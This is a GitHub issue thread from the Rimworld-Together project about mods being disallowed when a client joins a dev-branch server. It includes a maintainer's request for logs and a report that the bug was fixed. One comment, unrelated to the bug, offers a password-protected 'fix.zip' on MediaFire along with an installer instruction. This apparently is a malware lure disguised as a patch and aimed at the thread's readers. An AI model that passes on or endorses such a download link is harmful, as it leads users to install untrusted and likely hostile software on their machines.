### ISSUE TITLE
Bug on Dev branch

### ISSUE THREAD

**Issue by SimobiSirOP** [RimworldTogether/Rimworld-Together#147]
Checked Dev branch compatability and stability.

Copied mods that i use in stable branch and put it in development mod folder.

Some mods(Vanilla expanded Weapons and it's addons, Smart Speed from Sawg) loaded on server, but when client tried to join, it said, that these mods are disallowed.

Requires more testing

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Byte-Nova** [comment]
@SimobiSirOP Please offer logs from both sources (game and server) so the issue can be looked into further

**Comment by SimobiSirOP** [comment]
Logs:

[Player.log](https://github.com/user-attachments/files/16751156/Player.log)
[2024-08-26.txt](https://github.com/user-attachments/files/16751164/2024-08-26.txt)

Didn't find something helpful here

**Comment by Byte-Nova** [comment]
Fixed on latest push. Thank you for mentioning it!
